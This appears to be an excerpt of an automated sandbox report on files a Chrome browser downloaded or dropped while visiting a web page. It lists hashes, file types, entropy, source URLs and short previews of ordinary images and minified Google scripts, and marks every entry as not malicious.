                                                                                                                                                                                                                                                                                          SHA-256:BDB8CA6307E36E8506DAB613589E31006E00A5906E0CC9D2F1A043D118D9214F
                                                                                                                                                                                                                                                                                          SHA-512:FFAC2C6844122D3E3AF1A71AA2A9F7F8C994993BE66EBF7FA8EB8E4E5E40F8AFE4069D92EAFF04127A0AB0C128CCB796775730CE768E6CAB6EB05C992DE3602E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8 ....05...*....>m4.F.#).,2J10..gKr.^..76....{.]./.{..e.Gvr...7................0./........l..?M...'..Ev=j9....}t?....y.....d?.{#.5........u;..u.........~.q._...~......3..>...g.........../..?......O.......|_.../O?..,.?.zh.....oa.............z......w?......H.k....Z...I..1..:".......v..6.o.q#....3j....U.dM0U.s.:".3x.DX.o.....wx.X....dM0U.s.:".3x.>..5..V..._..btE.f.N....)..1..:".3x.DX.mSub..~]0....]}o.~......e...^Xcw...K._.z..:Z[..]..'w.;.,y.........J.b.!.h....H$.....8.....%.i....I/..'G.>.p..'e...!.D..%..MGt'.}.....h..@4..)*C./..D...H....=\...%.J.!.).H...Ouun.-.Y........U..%..j.a&....D.uD.=FR.\...~.<...[u....L..:.o...of.z...;0 f.&h.HTdI.U~5tRB%=..U..f..<....DU..........Y...\9i.HAW2.5q&........4K!...V........:l4l+.S.4..9...O......_.yt..O.2*v../.P .."D..'0.......].%..>..]X........[&.0.]))E.._.?.(..X. w.56.o.o<.C.].mQ..o....0.+.....D>.6...~....R..M.{..a.A|D"._x.......1.M.....g...f..z.(.t..Bj....?Yr.+@=B..%{..hq.'..a....0.3..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):52916
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.51283890397623
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                                                                                                                                                                          MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                                                                                                                          SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                                                                                                                                          SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                                                                                                                                          SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google-analytics.com/analytics.js
                                                                                                                                                                                                                                                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):6494
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.943667670984611
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:B/P5bqhhJodzNa1Jd2BizSlAW64RfG6D9hdvSYUk7:BJpKnmPlAgRbd+k7
                                                                                                                                                                                                                                                                                          MD5:08377DCFE868E193EABB464D8D98B586
                                                                                                                                                                                                                                                                                          SHA1:A1FA711B37BABC832EDC6C549B059F69A33BBFB1
                                                                                                                                                                                                                                                                                          SHA-256:8CDF9E5CAA016E221E531E14D41525E34FE2BB57E53F4A9BE8821EB6154E75A1
                                                                                                                                                                                                                                                                                          SHA-512:73930317AA4EFAF8262D3A8FAF523B5512E36464DA6C02151CD770096810EFD313386126E49CB7F8DD175F16DB3B3A86E5C33BA77FF77D3237628A20F39585DB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://maps.googleapis.com/maps/vt?pb=!1m5!1m4!1i4!2i4!3i6!4i256!2m3!1e0!2sm!3i707457581!3m17!2sen!3sUS!5e18!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcy5lOmd8cC5jOiNmNGY0ZjQscy5lOmcuc3xwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b2ZmLHMuZTpsLml8cC52Om9mZixzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy5lOmwudC5zfHAuYzojZjVmNWY1LHMudDoyMXxzLmU6bC50LmZ8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmd8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmwudC5mfHAuYzojNzU3NTc1LHMudDo0MHxzLmU6Z3xwLmM6I2Y1ZjVmNSxzLnQ6NDB8cy5lOmwudC5mfHAuYzojZjRmNGY0LHMudDozfHMuZTpnfHAuYzojZmZmZmZmLHMudDo1MHxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjQ5fHMuZTpnfHAuYzojZTllOWU5LHMudDo0OXxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjUxfHMuZTpsLnQuZnxwLmM6IzYxNjE2MSxzLnQ6NjV8cy5lOmd8cC5jOiNlOWU5ZTkscy50OjY2fHMuZTpnfHAuYzojZWVlZWVlLHMudDo2fHMuZTpnfHAuYzojYmZjZGRiLHMudDo2fHMuZTpsLnQuZnxwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b24!4e0!5m1!1e3!23i47083502&key=AIzaSyBux5gy-wv-c21aQl2an30LCk2KY4M9teI&token=31739
                                                                                                                                                                                                                                                                                          Preview:RIFFV...WEBPVP8LJ.../..?...&...0...y./6.P.6.......cT.I.C..... ..\.a....Z..l-...x.s...&6.e...Md+..l...q.w.5.o.mW.m.V.....C.....c..;.{......qT.:J.ev3..k./..?.R.ut3.....}usq....O....9..<KU...|..%._.<.n.r..........E..........1L?.......l-.,.U......K......j].#.z...%e5....0.. G.K..@...tzUzfY...R....].tK.8...z`..]......O?.Rz...c.qs,.............~.~.....3..@.Y.f.c....a...I.H...!..%..f.~...*.[n....z.......|I..NO..c.THg..Xt!._3M.x....k^..cY.v.e-...~X|$...-.S....B?.-..z...{}..1..,A...\...../h.h..z%..T.....r...~.e....z...]...\WkTd}..-}.}K...fM...|........o...o..L.....hm6%....\Gom....1...;6.i..'.I.?N....|.._..5...4.m..q.Z|..|....Y..$CI...X.H`...:..E.....?...Z.E..-un.....K...KuLuN..+.N..HP...6;f.,.:.T.>...}..~.3......G.Hu,..lsS..n....S...f.U.6..O......-....S.......=Q.C(..$.....-.zF..u)6L...\R.b.....$..0.T.VC.7....1..R.\....'...1w....j.emm./....&.?..R...u....g..=8*.R..K*#.K..t...J..w.)..NBrX2%..)(..&..$..lz..X.O[...:.\Ssa.W-..-{l...3...j.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):6058
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.95212689372517
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:eQta/WbhiMf+kZQlafWnAYP1q7oTrf9bUtbDlweYKnLEGzv/f7igvO/Yekg1/1R:em0Wbtf+kuSWnAYP1trfSbWe717fRI2Q
                                                                                                                                                                                                                                                                                          MD5:B45417EA380D8579FC290833F6E483B9
                                                                                                                                                                                                                                                                                          SHA1:F1CDE7EADD600E19E6AFCEF42E5944B20737CD96
                                                                                                                                                                                                                                                                                          SHA-256:7B3E057BFC8F289DE501AA00617370324A4ACDF5FE110AA950CE83D499F82766
                                                                                                                                                                                                                                                                                          SHA-512:DC6A523D252DC1612FD301D68FECCC633E4B01AB348B1C4FAB58C7A0F2F2B32C65E9B17DD50FDAAB8F713A0E6C73495B4C7384F84FF8374C2648B7FB067A4871
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....aIDATx..y.$Wu...Vu..gy....3....~...l.$..P...!@..H!B! ..A...@.$...8.)..Y.D@..@..1.C.....Y.7.y..........].f...~K.]N....s.m.`..&.`..&.`..&.`..&.@ .f\^^.)..>...a..V.Ez.OUQU.F........o;.*...v......'....wGQ.'..,....C6L'..Yfrt.x.w..*.,".DQ..+...D..{&..#o..7..> ?...0.F..c........g...d....{...w......`.....T....w....5...>|.w.1o......l..ro~..n.#.A..r...Dd...`...g...s.......'./"7..!.M.r~X...l...p..[.....H0..\.)..FR....:.sxY....?w..W....%XU..H.].?.sx9.Hk...e.>.......-kj../...o..|{.Mz.....s.Net$.......5...#X....9.}.e...s..>....N..hi..[.62Al......._`....$.c0....w.r.g..=..*.O...&..U..6.k.....N.........,l...k....E..n...x@s=M....-\..nym.PZ?G.Z\.J.6......XYYa~~.B.P%75..u........t......{...p..a...:a..s.=....V.e.e..#A.Nc..5so..\...a|..3......p..*.|T..Pu.o.9G..DQ......o.-M.7.$.....MB...y...d....6w'.k.>..q.6.d..uD.;X........Qk...9.......Qh.@........S.~.q.@.. ...:.a.8..7._.b&.....d.k.Ze.*.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65503), with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):557662
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.308303210305745
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12288:V9kJG8tABPY/GUcNOGl9PgwmJndRmKvFDSvBU5RH6xrmNDy:0JRVGUcNOGl9PgwmJtRH6x9
                                                                                                                                                                                                                                                                                          MD5:62BDF8FB78C08665C4F2FD8B9D10E69D
                                                                                                                                                                                                                                                                                          SHA1:86755BB24202ADEFBD6408CBEFF5937C6048540E
                                                                                                                                                                                                                                                                                          SHA-256:7772EB4733FAC2955DACC782934EA3B9C0E70D2D7B57FAB41997ABBDF7642B59
                                                                                                                                                                                                                                                                                          SHA-512:CFE705F43F83BACDD3DBE297B62E13030E4F23F23D048BB9EFB067D8D236E9A45E77CD07C72C588DEA0B180341E5880DA76E21F94C6E608843ADB029302369B2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://recovertogether.withgoogle.com/static/js/main-7772eb4733fac2955dacc782934ea3b9c0e70d2d7b57fab41997abbdf7642b59.min.js
                                                                                                                                                                                                                                                                                          Preview:!function r(i,o,s){function a(t,e){if(!o[t]){if(!i[t]){var n="function"==typeof require&&require;if(!e&&n)return n(t,!0);if(l)return l(t,!0);throw(e=new Error("Cannot find module '"+t+"'")).code="MODULE_NOT_FOUND",e}n=o[t]={exports:{}},i[t][0].call(n.exports,function(e){return a(i[t][1][e]||e)},n,n.exports,r,i,o,s)}return o[t].exports}for(var l="function"==typeof require&&require,e=0;e<s.length;e++)a(s[e]);return a}({1:[function(e,n,r){!function(cn){!function(){var e,t;e=this,t=function(){"use strict";var e="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:void 0!==cn?cn:"undefined"!=typeof self?self:{};function D(e,t){return e(t={exports:{}},t.exports),t.exports}function R(e){return e&&e.Math==Math&&e}function c(e){try{return!!e()}catch(e){return!0}}function F(e,t){return{enumerable:!(1&e),configurable:!(2&e),writable:!(4&e),value:t}}function d(e){return q.call(e).slice(8,-1)}function f(e){if(null==e)throw TypeError("Can't call method on "+e);return e}functio
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):6058
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.95212689372517
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:eQta/WbhiMf+kZQlafWnAYP1q7oTrf9bUtbDlweYKnLEGzv/f7igvO/Yekg1/1R:em0Wbtf+kuSWnAYP1trfSbWe717fRI2Q
                                                                                                                                                                                                                                                                                          MD5:B45417EA380D8579FC290833F6E483B9
                                                                                                                                                                                                                                                                                          SHA1:F1CDE7EADD600E19E6AFCEF42E5944B20737CD96
                                                                                                                                                                                                                                                                                          SHA-256:7B3E057BFC8F289DE501AA00617370324A4ACDF5FE110AA950CE83D499F82766
                                                                                                                                                                                                                                                                                          SHA-512:DC6A523D252DC1612FD301D68FECCC633E4B01AB348B1C4FAB58C7A0F2F2B32C65E9B17DD50FDAAB8F713A0E6C73495B4C7384F84FF8374C2648B7FB067A4871
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/j-XIfKqwPWybhyqkxFlF2ArD-XgPk2y41V-bjbf1l7yIm2kh1diwMAFgSFUJCwUob3LkfV_PSlpt0qsLLeVCpBCaiDZ2j5yStmaa-w=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....aIDATx..y.$Wu...Vu..gy....3....~...l.$..P...!@..H!B! ..A...@.$...8.)..Y.D@..@..1.C.....Y.7.y..........].f...~K.]N....s.m.`..&.`..&.`..&.`..&.@ .f\^^.)..>...a..V.Ez.OUQU.F........o;.*...v......'....wGQ.'..,....C6L'..Yfrt.x.w..*.,".DQ..+...D..{&..#o..7..> ?...0.F..c........g...d....{...w......`.....T....w....5...>|.w.1o......l..ro~..n.#.A..r...Dd...`...g...s.......'./"7..!.M.r~X...l...p..[.....H0..\.)..FR....:.sxY....?w..W....%XU..H.].?.sx9.Hk...e.>.......-kj../...o..|{.Mz.....s.Net$.......5...#X....9.}.e...s..>....N..hi..[.62Al......._`....$.c0....w.r.g..=..*.O...&..U..6.k.....N.........,l...k....E..n...x@s=M....-\..nym.PZ?G.Z\.J.6......XYYa~~.B.P%75..u........t......{...p..a...:a..s.=....V.e.e..#A.Nc..5so..\...a|..3......p..*.|T..Pu.o.9G..DQ......o.-M.7.$.....MB...y...d....6w'.k.>..q.6.d..uD.;X........Qk...9.......Qh.@........S.~.q.@.. ...:.a.8..7._.b&.....d.k.Ze.*.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 640x426, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):110046
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.978901269855362
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:tEh+SUiCjNQA97QiSUwwkSBjVBarCHLug+oc:uh+SDCjN9EDUwwzBxKCwoc
                                                                                                                                                                                                                                                                                          MD5:B5CCE833D7CCA691C296543BB9DB8FB3
                                                                                                                                                                                                                                                                                          SHA1:875B05C937AE2A08CDCA61659EA8942CDA68E23E
                                                                                                                                                                                                                                                                                          SHA-256:9ED1CED49C7B004305A59199627D77C7472232E63B791A3F6CD93D0D4E799EDC
                                                                                                                                                                                                                                                                                          SHA-512:A83A3437D05B9378E2B4D856642518CD3DA662216BF7C67F2AFDD01CC5DE8223504C7ED75D2F04D86ECE4B6F24A177901BB06FB54098A5784306CBDEBDB70BF2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/b2/25/6c71aa9841d9b0c1f0269d4e27f1/pipes-medium.webp=w700
                                                                                                                                                                                                                                                                                          Preview:......JFIF..........................................................................................................................................................."..........................................`.........................!...1."A.#2QaBq..$...3RTbr......CSs.......%4ct....u....5DEd.......6Ue.................................E.........................!1.AQ."aq.2.....#BR.....r$3b.....4C%c..5St............?.........V5......t..~.o.p.L.cS.YW...)~.6?...;_..b.<{.gC..&|).(V..u,.P[.&.v.[w?/..4I.WVj.*......Qm*....ccte.cv..4q.B.ir.........Fji...5..5k..p.wA...$h.+..I/b....v......M..Ax...t^..F.....]n.w.Kn.c.Q.C.....{.~5....t....'-...~..7.p.q..9G.............p.J....q...!...n....{...../p....Y}..dkG,h.p>$p.g_X.v.,.cl.........j.....,...Y2_..,.J(....UU..=...l=qi.!.:..-uB.QQ.M.6sON....a$....TO.N.xy9U...!#.(...,.{.Rzp....}I...<1L..'..7.........).o..|<.h.xda.....o..|..6i.......F{.7..N._r..cqBx...v.Tu[...Z...... .".8...z..M.&=.q...w.....}....*is.v..V:.Rd..*G.s..V).m...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (523)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1312
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.318433518103831
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:jZO5avW+bJos0We6gZO5/J3sSV2JkvHsZFMkOtVmhURvYFinA/WbnA/Wfu9m4dkt:YwOUisvtnnwWvc8DmKRRnAebnAefuHlI
                                                                                                                                                                                                                                                                                          MD5:E3B58D779853888418A1D0367FB04208
                                                                                                                                                                                                                                                                                          SHA1:732ED77448D80A2FAB9446104755D4C99741580D
                                                                                                                                                                                                                                                                                          SHA-256:BF064460A823B22DF1EE85EE6F2602181E7E8F56C501F7D2CCC13FE0ECBCAB55
                                                                                                                                                                                                                                                                                          SHA-512:027E122F644EEDD120DDFB27E2C68B2E11C246CE7D95F0768D5AD537A3A1F155FAD959FDAD178DCCEC45B6B92B786C68F716760D155DE479B25381EC16FAC089
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:/**. * @license. * Copyright 2017 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */const a=e=>n=>typeof n=="function"?((t,o)=>(customElements.define(t,o),o))(e,n):((t,o)=>{const{kind:r,elements:i}=o;return{kind:r,elements:i,finisher(l){customElements.define(t,l)}}})(e,n);/**. * @license. * Copyright 2017 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */const u=({finisher:e,descriptor:n})=>(t,o)=>{var r;if(o===void 0){const i=(r=t.originalKey)!==null&&r!==void 0?r:t.key,l=n!=null?{kind:"method",placement:"prototype",key:i,descriptor:n(t.key)}:{...t,key:i};return e!=null&&(l.finisher=function(s){e(s,i)}),l}{const i=t.constructor;n!==void 0&&Object.defineProperty(t,o,n(o)),e?.(i,o)}};/**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */var d;const m=((d=window.HTMLSlotElement)===null||d===void 0?void 0:d.prototype.assignedElements)!=null?(e,n)=>e.assignedElements(n):(e,n)=>e.assignedNodes(n).filter(t=>t.nodeType===Node.ELEMENT_NODE);function
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 1070
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):539
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.570016325311205
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:XuMclOYQRUYEPuXiYMCeVhLbFL5iyJS1nU0H0M1Q8N2mFJ:XuMcxQRUYIYM5hLjoUC0MNFJ
                                                                                                                                                                                                                                                                                          MD5:4F1E2F30FF237825083F69AAA136778E
                                                                                                                                                                                                                                                                                          SHA1:15612AE8BD351CA32D10A341DB3932C8D1DFD587
                                                                                                                                                                                                                                                                                          SHA-256:AF14599FB250F5368180B462CAC4D2465AF3398DC0F4ABBAE4D9899FAAAC33D9
                                                                                                                                                                                                                                                                                          SHA-512:889CDBDC8C3BEBE56EC0DD16A5E08807BDB1E50843E20F923BDFFC8AC4FC2A329204EF9130E078CDF71D27C8646FAFF47EB1FAC797281FC509AD3B668B03EA47
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...........SMo.0...W..%.b.,.~.H....\.T.E.f.Z.W.M.}mc.Re.Z>.=o....c..d..Oq..../D.x..._7d......+4.R.........ZM....U.S.#....x.4.H....R.-..0x........T.w..a|..0.l6.zqv..J>..~...+!..n....2.bt...Mp...1>..Z...y.hi7...R*.....:.#O.].}..+(...vT^B.kB.1.-. ..Jp....rU.-.A0...F!/.P.z.Vl...wVA.W+..E.....B...`.W8K..vO.5N.%.-..'F..b.)..t"S.1.....&..h..t....S.../.I+.X..C=!J........,"=cv]!....e.e..{.]..Hz.J..4.>.....$3y.J..[..A.I..f.#.1J.=w..`nk.....~.Vh..LL......>....+...r...?76.|y./..X......B.!.{....V...]...../.........$.......
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 512 x 384, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):312061
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.981383487988184
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:N1k8JCW7sSJuh4N2cX/iDkBOncmLOkAeWnVv/6buLcrs8IuUl:Nu8JCYTJuh4NFPiDzcMH4nl/LLDpuA
                                                                                                                                                                                                                                                                                          MD5:D90E1FA816B988782E1E652A3C34913A
                                                                                                                                                                                                                                                                                          SHA1:8C49BBB1DC243C2347998A4966CC43B4A208BDB8
                                                                                                                                                                                                                                                                                          SHA-256:CFCCF134704E895D13AE760062B37C3A435D951A8007BBEBAB88ED01B7AA53C4
                                                                                                                                                                                                                                                                                          SHA-512:809B9F325723FECE912B5180003D16CCBD88495859C47A82EC8325F64BDACFF26A5E5A57241C5ACE5C099F080C2B7CB30E67698DED4995B4A848B7497DDE4649
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/UrtOTOQn0umKcsyJwL9X7mffZz1_SCQcB8iv25zV81lMoHfaPD03Omb14RNyN33Uxr32rsqwRgHpGkhXIVJwD2jB1NBmRUiexA_bC1ICZBYvs3Ggh2A?=w1440
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............TBM.....pHYs................IDATx...Y.$K.&.}".j./....zzz....\.q.r_H...........H.|.3..lU.U....pw[TE........T5g.zUeE......~"..F.............N.... '.........2s8. LBN...'".... ".!..ww.C...Kp\9."`....ALp.3.@|..63.3.D....u.L.afv.......(D0s.....0......."P..|.%....7..D..@f.......x.FL..F.0...#..."8........3...'.8...sj.CUW..D0.........6...wGb..q......n.r.f.>.........Y..h.u..W.{.....{.W.W........|...m....yY............N...>..x...9..l........bf.......B..8)...E1...x..N................n....y._....y..0.`Y.....7..}.$.K.Z...e......w.`....p......q.........n.*.31.$..G..T..s.....j..&.R.9...L0#...H..]O...OOOD8..k......H"...("e.A0.RJ.jf......$.sz......|..t..7...I(...'/.W..8H..YI...A..0s7....@.Cl..V.5h%.W.-.XBf....n...g..D.....7.qr.`.... ..8.;yCM..[.....d.. .W...9^.5(.sAhPJm..M..".)....l.3.S..@qr..i..8..C..z/..m..9n..-..md.d..oH.._.............=..b.!-..bj...!.....v.....n.&\.C........,s.#..D..7GD.g....BV.=.=....-N........u...$.] ......
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 789
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):450
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.4245184897347825
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:XPpJh5V6KXpcSnPosMRrcTLDrn7JXmB4Vv3t3:XPAWcSnPofRQrrnRmqVvF
                                                                                                                                                                                                                                                                                          MD5:666EEA998CA0E1C448124C744D6865AB
                                                                                                                                                                                                                                                                                          SHA1:604F4E21FCFCEC87012B0B1E5503ADB332C0F9E0
                                                                                                                                                                                                                                                                                          SHA-256:1E703F7D1D002C71C366C7BE44FE3780B8A76CF8F3D91B9817DF5475CBB713BD
                                                                                                                                                                                                                                                                                          SHA-512:9BCA60CC33932C85C05FB91CB7772EFCF77FE992FABA39DB871B43B20F643BF1499A5B909540713821A6ECF8D5EDD2E5455E33BEE6065486B016E951969BBDD6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://recovertogether.withgoogle.com/static/images/icons/accordion-arrow.svg
                                                                                                                                                                                                                                                                                          Preview:..........|R.n.0...+..%.j.!.5+ j...n{^.p.Z.F......c.(j3...7zof<..t....J.......j.l....W..Cy..s..hl.j.0!.h;.d....j*P.1P.4q..R...HS...a.E.8.1%J.Q..q..C.n.<...fY.y..W.,..1|...*........I..-....Y.8I.QR..`....=/E}8...ts..V..;7.-..n.)...E...?k^Y......<..R.h.....To.....H*.....D.,.~.g.._...g.U.a......"....Y.S...fopF..}.L...".%....<<...*.:..........v#..Z!....=8...{w..,.a[H..c>.l..-8.$.^.R........j...*3.].Y>.._.<j_......K,..........N.....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (1538), with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1538
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.637834506566838
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:ZaxeepoLWTXB09LozobMujXEpA/7VaCnkL/:Zaxea7TYco4pADV/nkL/
                                                                                                                                                                                                                                                                                          MD5:257CDFE7CA10A13D99049DE9527A7729
                                                                                                                                                                                                                                                                                          SHA1:AB1D768666C2B1A6598DCB8407910FFCF48CC399
                                                                                                                                                                                                                                                                                          SHA-256:47539426F29D770524A58D37EC2241127FAE899018043D9F00326CE26BC365A4
                                                                                                                                                                                                                                                                                          SHA-512:7CC2591053765378C01B12CF63B1A3B0651C4A5185DD7B40DB5FB42F4AA14D1127F9A9774D9E17087E86490CA779495914EEEF5F5D62B65F0583955DC225D735
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://tasty-library.surge.sh/
